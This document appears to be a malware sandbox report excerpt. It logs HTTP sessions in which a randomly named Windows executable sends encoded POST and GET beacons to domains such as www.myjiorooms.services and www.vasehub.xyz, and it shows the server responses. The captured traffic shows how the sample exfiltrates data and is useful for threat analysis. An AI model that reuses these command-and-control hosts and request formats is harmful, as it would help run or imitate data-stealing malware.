                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.224916915.197.148.33801720C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 12, 2024 11:20:02.626880884 CET2472OUTPOST /fksk/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.myjiorooms.services
                                            Origin: http://www.myjiorooms.services
                                            Referer: http://www.myjiorooms.services/fksk/
                                            Content-Type: application/x-www-form-urlencoded
                                            Content-Length: 3626
                                            Cache-Control: max-age=0
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Z667T Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                            Data Raw: 33 56 58 44 45 3d 4f 59 58 34 43 42 32 6f 66 57 70 41 47 65 51 37 36 6d 6e 6c 71 4d 50 50 42 5a 2b 6f 48 6b 75 2b 34 4a 43 78 32 49 31 62 52 65 79 77 69 55 62 5a 62 34 46 66 54 4d 34 70 2b 30 65 35 41 4a 4d 58 76 5a 2b 53 6f 38 42 63 37 39 41 51 53 52 33 42 35 6e 79 45 44 34 7a 67 48 38 56 52 56 61 52 53 67 55 7a 6f 6d 47 66 7a 73 64 54 66 65 76 49 42 66 53 33 52 79 78 65 2b 6b 6a 6e 38 4c 54 69 76 76 43 42 35 74 73 44 53 73 50 6e 64 6c 61 4e 46 33 6e 42 2b 4c 6a 69 47 34 6a 47 38 57 4f 36 56 52 62 54 36 62 6e 6b 30 6b 31 6c 46 35 6d 75 41 39 43 49 7a 64 4c 61 67 47 78 48 78 38 47 63 37 61 76 49 4c 36 71 64 77 4c 37 73 78 4d 47 36 6e 54 50 30 58 51 62 2f 39 63 51 69 67 79 38 2b 57 7a 79 61 4b 4a 58 2f 4f 63 45 71 4b 56 7a 69 69 43 79 45 70 39 2f 6f 46 4f 37 49 76 45 55 34 70 68 4d 6b 50 4d 44 73 69 64 6a 66 66 71 53 39 68 47 37 61 4d 4d 79 59 42 62 79 41 50 6b 61 39 54 41 64 57 43 71 70 63 6c 35 76 43 39 37 32 42 64 75 46 56 6a 38 5a 35 4f 46 74 57 68 6c 47 6b 63 74 48 36 39 2f 5a 6d 4f 6a 2b 6e 6d [TRUNCATED]
                                            Data Ascii: 3VXDE=OYX4CB2ofWpAGeQ76mnlqMPPBZ+oHku+4JCx2I1bReywiUbZb4FfTM4p+0e5AJMXvZ+So8Bc79AQSR3B5nyED4zgH8VRVaRSgUzomGfzsdTfevIBfS3Ryxe+kjn8LTivvCB5tsDSsPndlaNF3nB+LjiG4jG8WO6VRbT6bnk0k1lF5muA9CIzdLagGxHx8Gc7avIL6qdwL7sxMG6nTP0XQb/9cQigy8+WzyaKJX/OcEqKVziiCyEp9/oFO7IvEU4phMkPMDsidjffqS9hG7aMMyYBbyAPka9TAdWCqpcl5vC972BduFVj8Z5OFtWhlGkctH69/ZmOj+nmIx8AwWtoYHX1eVEz3G4lHax5ExnaergbHUUaF0AqQwyLQL3mgOAVnT1x8RjtBqSyH9zeXycV1WhuLTrAIPfIvNmVFCAO2LM9M1wsN/I0QKgu19STD0oNoBZQFYcN7deqmGWsTBXOhwyk238QG6B17SNdeGeYnnayPfBmeg0oW5pjfpPloj/5Zw25YA/YUUxRzPyhJAv4Bn+chh+nn3DrenQ0FCdBRL3kcmXBtWwNRy6jmZD0hc6bCQj+vpQglectiB1DYe4oC14/r8ZdBJOEBpHJZfZtGXy7l0ncCbyh6K/nnIpd+cXs2hWubULYuF+aYfK4VPf/AOwE7TpgQuCCjzIeMjwkZ4JvA6AiqoLJmfrxjyxRHmRhnddObjjrsIx0SvfdiGBTu/wkKHxXLp6xgnaBzUwN81jsd5DYpu3WF5ZrzCK4+ms3zP6beLFsR0SIg+xrVidsYeOkWZAcqHeA1q1pkfCUgcmFIBdDP39rTKLtg5eYNDHv5AU2UREKPqrcv/ORetAPQ5HmiUwWXX9NFbVmpgiOMM4Ceq18pgwibfO+wxMy9P0OA4aeJ5Zga1+7ctYEYj8mCqBt6msMfEm/kZpHZB2Giev5XrrqbtJbgKrRGSP2vGV4JWQNTtBS+cnQdcjCYpR783iqaNLaQobdsq6NBdzE7/Dfn5 [TRUNCATED]
                                            Nov 12, 2024 11:20:02.631880045 CET1724OUTData Raw: 57 43 33 51 79 55 74 67 31 35 71 70 66 4b 6b 6a 41 68 51 54 30 7a 38 36 68 6b 76 47 36 32 58 4a 4a 74 4a 59 62 4a 71 5a 64 77 59 6d 6b 71 59 2b 73 6b 63 38 45 58 50 77 38 31 5a 61 56 4a 67 51 44 56 33 79 4e 46 5a 48 45 7a 6d 2b 59 4c 67 77 76 42
                                            Data Ascii: WC3QyUtg15qpfKkjAhQT0z86hkvG62XJJtJYbJqZdwYmkqY+skc8EXPw81ZaVJgQDV3yNFZHEzm+YLgwvBaSofYz5ojzghz3LoUHjtPxBF55uGcl4UPz7Mf2xmv08u4THccGrtK9HgRunZgnUMlK0+m/xvxWZ8hg7puXGZe7ARlDu8xiVuPXiI9JSjLLyME4mkMIY0MG3XrSDUzwSBxzzhhcczTz9w0bw27nVBOdlf/BHgozIwB


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.224917015.197.148.33801720C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 12, 2024 11:20:05.166052103 CET499OUTGET /fksk/?3VXDE=Da/YB3Khdl1nHqF+sXSftOGWFPDcK1D40N3MmeZhH+yFl3LdN7J6XJQSvkWEDqgMgq2RkLMqt/sISVLUgAiTepatAcdQK/RR2laDsmCNg7CjeO0+DkiAxRGVn1KL&XJNx=abrdnJXXqdPhC HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.myjiorooms.services
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Z667T Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                            Nov 12, 2024 11:20:21.039622068 CET404INHTTP/1.1 200 OK
                                            Server: openresty
                                            Date: Tue, 12 Nov 2024 10:20:20 GMT
                                            Content-Type: text/html
                                            Content-Length: 264
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 33 56 58 44 45 3d 44 61 2f 59 42 33 4b 68 64 6c 31 6e 48 71 46 2b 73 58 53 66 74 4f 47 57 46 50 44 63 4b 31 44 34 30 4e 33 4d 6d 65 5a 68 48 2b 79 46 6c 33 4c 64 4e 37 4a 36 58 4a 51 53 76 6b 57 45 44 71 67 4d 67 71 32 52 6b 4c 4d 71 74 2f 73 49 53 56 4c 55 67 41 69 54 65 70 61 74 41 63 64 51 4b 2f 52 52 32 6c 61 44 73 6d 43 4e 67 37 43 6a 65 4f 30 2b 44 6b 69 41 78 52 47 56 6e 31 4b 4c 26 58 4a 4e 78 3d 61 62 72 64 6e 4a 58 58 71 64 50 68 43 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3VXDE=Da/YB3Khdl1nHqF+sXSftOGWFPDcK1D40N3MmeZhH+yFl3LdN7J6XJQSvkWEDqgMgq2RkLMqt/sISVLUgAiTepatAcdQK/RR2laDsmCNg7CjeO0+DkiAxRGVn1KL&XJNx=abrdnJXXqdPhC"}</script></head></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.2249171162.213.249.216801720C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 12, 2024 11:20:26.144787073 CET2472OUTPOST /uzgu/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.vasehub.xyz
                                            Origin: http://www.vasehub.xyz
                                            Referer: http://www.vasehub.xyz/uzgu/
                                            Content-Type: application/x-www-form-urlencoded
                                            Content-Length: 2162
                                            Cache-Control: max-age=0
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Z667T Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                            Data Raw: 33 56 58 44 45 3d 49 30 56 39 7a 61 5a 2f 6b 6b 69 47 61 30 36 65 53 76 4d 32 63 45 50 43 37 47 6b 65 53 63 77 72 45 49 74 39 66 47 38 6b 2b 51 52 41 35 45 4a 63 77 51 6e 66 36 51 57 41 37 33 75 2f 63 6a 44 52 49 64 43 79 47 4e 43 66 72 6d 31 69 76 58 38 62 44 50 41 32 70 73 6b 74 49 52 4b 67 54 68 79 52 54 42 41 52 50 66 5a 54 55 57 7a 56 72 5a 65 2b 55 33 73 67 59 55 32 57 44 51 68 79 6f 34 67 65 6d 39 64 6c 56 4f 51 65 52 6c 39 68 54 57 45 44 54 65 2f 78 42 55 2b 6b 70 36 48 6e 35 33 65 77 4a 4c 6b 38 71 46 6f 41 4a 55 42 48 6a 6e 48 35 58 4b 6e 2b 48 42 54 39 36 30 6d 48 32 44 42 4b 56 56 39 6f 2f 34 61 30 70 54 6b 4e 32 4d 4a 48 48 33 35 37 6c 4d 6f 44 54 4e 55 42 42 66 2f 4c 2f 6e 49 63 41 57 75 43 6b 77 47 78 49 34 39 76 58 65 35 50 39 59 59 52 46 4a 47 41 75 75 41 75 6b 43 6c 41 56 2f 6b 5a 53 6f 6d 63 35 61 35 44 45 38 76 39 4a 69 48 4e 78 32 4f 49 49 74 53 78 38 4b 32 76 75 72 77 66 76 30 44 50 67 63 38 4d 66 53 44 79 30 65 51 50 32 57 64 70 67 67 6e 50 72 50 4e 47 78 42 65 32 35 7a 36 52 [TRUNCATED]
                                            Data Ascii: 3VXDE=I0V9zaZ/kkiGa06eSvM2cEPC7GkeScwrEIt9fG8k+QRA5EJcwQnf6QWA73u/cjDRIdCyGNCfrm1ivX8bDPA2psktIRKgThyRTBARPfZTUWzVrZe+U3sgYU2WDQhyo4gem9dlVOQeRl9hTWEDTe/xBU+kp6Hn53ewJLk8qFoAJUBHjnH5XKn+HBT960mH2DBKVV9o/4a0pTkN2MJHH357lMoDTNUBBf/L/nIcAWuCkwGxI49vXe5P9YYRFJGAuuAukClAV/kZSomc5a5DE8v9JiHNx2OIItSx8K2vurwfv0DPgc8MfSDy0eQP2WdpggnPrPNGxBe25z6RN7JizAU734Ntx5Uvy5xKxQX07e49imNn0IwzerKymTfjPRVYfjbdG1I8z/pdgLmjZOFh4MNHKLr9YQWrd53z1fyFIlqrHbxbku5kWGk3zc9NIIf0Pa7G36NvVDevZwXK2R8o2tledkZQqrH4aWQRTX/jBZjL6zmC4fZh2FOLzQBoMsyUV9xNK0pwcC3hNkCx9Ner7nFIZzzsSNlFbF8zII04Lo/dT7iCYyJNKYH6nnAgax21Cgc+PB/jARjT4WnuzQaODC+Quex5ehujEfoQfw7xLmB2b7wPgn60lSGzEX/h0NES8R+LxiK5lQ9xCKMLfM3Smw7G44liQAvQu6YtcOSudL4AOKGsej0r6+ZxFNhzAAoWBN+T09seIuSbnieL0bw+yVSnZYWcyyvtadIxh1T3ZcPbRHzYZI1Ngp8/Q31c9RwUGC1SJ1f5RthCIUkEf8sRUe9I+FtluY/hhFnasl6n8bwKHR5nb/8TaJC1/nNgdDuevwZG5GXVVM+aMCdBlSA9b6csvWhXeWB4cyzbfZM4iLA0abmS3isiOpo6qIMkkC+gIGNPp64xvMwieib/yvc5mTM4O4UYP3/b4Rqzc6nHKOTiNze8MTd63lxVo6bQibCSW5VtdJgzQHKo6BCsctqW2CXOD4YKKGqEKUpIaLDT62eydSq3t3 [TRUNCATED]
                                            Nov 12, 2024 11:20:26.150213003 CET236OUTData Raw: 65 78 6c 45 77 49 4d 4c 72 32 62 62 66 34 6f 58 4a 2b 4b 76 61 38 32 4b 54 41 55 66 4f 6f 4e 4a 4d 79 31 6c 2b 50 50 4c 63 76 46 51 56 34 68 2f 59 32 33 62 49 55 6d 56 65 55 67 64 6a 51 78 2f 67 69 6f 54 4d 6f 74 48 75 65 59 65 58 6d 6d 31 49 5a
                                            Data Ascii: exlEwIMLr2bbf4oXJ+Kva82KTAUfOoNJMy1l+PPLcvFQV4h/Y23bIUmVeUgdjQx/gioTMotHueYeXmm1IZb+09dypH5otoaSX+aDWk6stuPDDnM+D2gEfneJjMsJgH4qpn01fCra4mFf5njCjzZhbYBY9sL/8d9/Py91Ah6n8yIpyBTmsjfy2fDl4G7dntNNpS/1565TChqmrrcrepj6e0fChr9IzEbUcM0Bi0zlp7FZ
                                            Nov 12, 2024 11:20:26.841028929 CET533INHTTP/1.1 404 Not Found
                                            Date: Tue, 12 Nov 2024 10:20:26 GMT
                                            Server: Apache
                                            Content-Length: 389
                                            Connection: close
                                            Content-Type: text/html
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.2249172162.213.249.216801720C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 12, 2024 11:20:28.678906918 CET747OUTPOST /uzgu/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.vasehub.xyz
                                            Origin: http://www.vasehub.xyz
                                            Referer: http://www.vasehub.xyz/uzgu/
                                            Content-Type: application/x-www-form-urlencoded
                                            Content-Length: 202
                                            Cache-Control: max-age=0
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Z667T Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                            Data Raw: 33 56 58 44 45 3d 49 30 56 39 7a 61 5a 2f 6b 6b 69 47 61 33 69 65 54 2b 4d 32 64 6b 50 43 36 47 6b 65 4a 73 77 74 45 49 70 4c 66 44 51 30 2b 69 78 41 67 78 4e 63 33 6a 66 66 33 77 57 48 77 58 76 34 53 44 43 46 49 64 43 59 47 49 69 66 72 6e 56 69 75 78 67 62 42 4f 42 67 32 4d 6b 76 4f 52 4b 39 54 68 50 74 54 42 63 42 50 65 78 54 55 55 6e 56 71 5a 75 2b 52 53 77 67 50 6b 32 51 4c 77 68 44 6f 34 73 4c 6d 39 74 39 56 4e 30 65 52 52 6c 68 55 48 6b 44 57 4e 58 78 49 30 2b 66 32 36 47 4d 6f 69 6e 35 4d 4a 51 4d 67 46 34 65 41 30 5a 6f 71 51 33 49 4f 36 65 2f 50 69 44 55 7a 69 50 75 2f 53 30 39 4c 51 3d 3d
                                            Data Ascii: 3VXDE=I0V9zaZ/kkiGa3ieT+M2dkPC6GkeJswtEIpLfDQ0+ixAgxNc3jff3wWHwXv4SDCFIdCYGIifrnViuxgbBOBg2MkvORK9ThPtTBcBPexTUUnVqZu+RSwgPk2QLwhDo4sLm9t9VN0eRRlhUHkDWNXxI0+f26GMoin5MJQMgF4eA0ZoqQ3IO6e/PiDUziPu/S09LQ==
                                            Nov 12, 2024 11:20:29.368853092 CET533INHTTP/1.1 404 Not Found
                                            Date: Tue, 12 Nov 2024 10:20:29 GMT
                                            Server: Apache
                                            Content-Length: 389
                                            Connection: close
                                            Content-Type: text/html
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.2249173162.213.249.216801720C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 12, 2024 11:20:31.222253084 CET2472OUTPOST /uzgu/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.vasehub.xyz
                                            Origin: http://www.vasehub.xyz
                                            Referer: http://www.vasehub.xyz/uzgu/
                                            Content-Type: application/x-www-form-urlencoded
                                            Content-Length: 3626
                                            Cache-Control: max-age=0
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Z667T Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                            Data Raw: 33 56 58 44 45 3d 49 30 56 39 7a 61 5a 2f 6b 6b 69 47 61 58 53 65 57 64 55 32 62 45 50 44 6a 32 6b 65 53 63 77 70 45 49 74 4c 66 47 38 6b 2b 52 64 41 35 47 42 63 33 41 6e 66 37 51 57 48 6e 48 75 2f 63 6a 44 51 49 5a 69 63 47 4e 50 71 72 6a 78 69 76 57 38 62 44 4d 6f 32 2b 63 6b 74 46 78 4b 69 54 68 50 43 54 43 6b 4e 50 65 31 35 55 55 2f 56 72 76 53 2b 5a 43 77 6a 57 45 32 51 4c 77 68 58 6f 34 73 72 6d 39 6b 36 56 4d 63 4f 52 69 74 68 54 6d 45 44 61 4f 2f 2b 4f 30 2b 62 2b 61 48 70 35 33 61 64 4a 4c 6b 77 71 46 38 6d 4a 55 4e 48 6a 79 54 35 58 4a 2f 2f 62 68 54 2b 30 55 6d 48 72 54 42 4d 56 56 39 30 2f 34 61 30 70 54 59 4e 30 63 4a 48 48 31 52 34 68 4d 6f 44 4d 39 55 32 63 50 79 38 2f 6a 68 4e 41 57 65 38 6b 42 43 78 4a 2b 70 76 54 75 35 50 36 6f 5a 59 46 4a 47 48 6b 4f 41 49 6b 47 49 39 56 2f 30 4a 53 6f 6d 63 35 66 74 44 44 71 44 39 4a 79 48 4e 75 47 4f 46 43 4e 53 79 38 4b 69 42 75 72 55 66 76 77 50 50 76 4c 34 4d 49 41 62 39 2f 4f 51 43 79 57 64 72 33 51 6d 56 72 50 42 38 78 43 2f 6a 35 79 4b 52 [TRUNCATED]
                                            Data Ascii: 3VXDE=I0V9zaZ/kkiGaXSeWdU2bEPDj2keScwpEItLfG8k+RdA5GBc3Anf7QWHnHu/cjDQIZicGNPqrjxivW8bDMo2+cktFxKiThPCTCkNPe15UU/VrvS+ZCwjWE2QLwhXo4srm9k6VMcORithTmEDaO/+O0+b+aHp53adJLkwqF8mJUNHjyT5XJ//bhT+0UmHrTBMVV90/4a0pTYN0cJHH1R4hMoDM9U2cPy8/jhNAWe8kBCxJ+pvTu5P6oZYFJGHkOAIkGI9V/0JSomc5ftDDqD9JyHNuGOFCNSy8KiBurUfvwPPvL4MIAb9/OQCyWdr3QmVrPB8xC/j5yKRN9Viwkg73INurJUr24MLxRva7eNfikZn0dczZt2t4TflMhVBbjb/G1cez69dgfajXulh8/1EbLr+LAWCXZ2q1ZfQIh27HrBbke5kCAQ0s89MGoehWK6b36NFVD+ZZBvK2VAo34RedkZRtrGxQ2d8TXzZBZ/b60eC/PJh2HmLpABoLsyPfdxLK0tKcAHbN1ix6sOr5hxINjzqQNlVF18UIIk4LpbNT7KCZXxNYqv6uHAkZx2cCgdBPB73ARzp4QfuzRaOLmKQx+x4chvrP/oKfwDhLm9Yb5QPx0y02XmzCH/j4tESzx/WxiiPlRBLCOYLf9nS3A7BxYl9AwuGq6YzcK2udL0AOLusCAMr/NxxaNhxOgoIYd6/0988Ir+LnhaL0Kw+1TmkH4WW3yvdQNIJh1TrZe/yEl7YaatNlMc4PH0W3xwlIi0tJ1PDRsVSInAEf9cRUMFI+1tluY/uhFnGsl3W8ZpvHR5ndu8Tb7q1n3NpSjuFiQYb5GTvVMm8MCxBnCg9b6ctgGhQS2B/cyvsfZMaiLc0aoqS2zMiOPE6toMkzy+jRWN0p65svN8yemP/0f85lWg7FoUVHX+CtBmSc6qUKMfiNA68NCd63VxVz6bPs7CLYZphdIMJQDO46QSsG+CWwF7JXYYPEmqGKUlzaLKc63WMdVu3qX [TRUNCATED]
                                            Nov 12, 2024 11:20:31.227334976 CET1700OUTData Raw: 65 78 6c 35 77 4a 6f 4c 72 32 4c 62 66 34 49 58 49 4f 4b 73 46 63 32 4c 65 67 55 59 41 49 4e 56 4d 79 31 62 2b 4f 69 75 63 74 4a 51 56 71 4a 2f 65 48 33 62 49 6b 6d 58 58 30 68 42 6f 77 38 79 67 69 6b 58 4d 71 6c 58 75 76 34 65 47 41 69 31 4f 72
                                            Data Ascii: exl5wJoLr2Lbf4IXIOKsFc2LegUYAINVMy1b+OiuctJQVqJ/eH3bIkmXX0hBow8ygikXMqlXuv4eGAi1Orj+zdcVhn4otoW6X/q1WheKtfTDFXM+HzMFbnfMzssIgH4SpnMLfAvK4k1f5lLCyTZicoBe+sKq8dhGPyFXAhqn82YpxhDmvjfyrPDs7G6NtNBOpSSN/+50F0PEkr4JGqqGInDSmrJJzniMTvgJjlnln8QXiyrJvns
                                            Nov 12, 2024 11:20:31.909250975 CET533INHTTP/1.1 404 Not Found
                                            Date: Tue, 12 Nov 2024 10:20:31 GMT
                                            Server: Apache
                                            Content-Length: 389
                                            Connection: close
                                            Content-Type: text/html
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            9192.168.2.2249174162.213.249.216801720C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 12, 2024 11:20:33.762178898 CET491OUTGET /uzgu/?XJNx=abrdnJXXqdPhC&3VXDE=F29dws9Qm3zXdw7iB9oHSn/dthoKXPcyF5IHcXQEgDtq40lW8Cn3ziqNmynmRVOjEauFGJXilSJYjlEXJuVGqPsSKTedUmHvSAt7JfIiTnbOkuaAQxhGe3GDHkQu HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.vasehub.xyz
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Z667T Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                            Nov 12, 2024 11:20:34.442708015 CET548INHTTP/1.1 404 Not Found
                                            Date: Tue, 12 Nov 2024 10:20:34 GMT
                                            Server: Apache
                                            Content-Length: 389
                                            Connection: close
                                            Content-Type: text/html; charset=utf-8
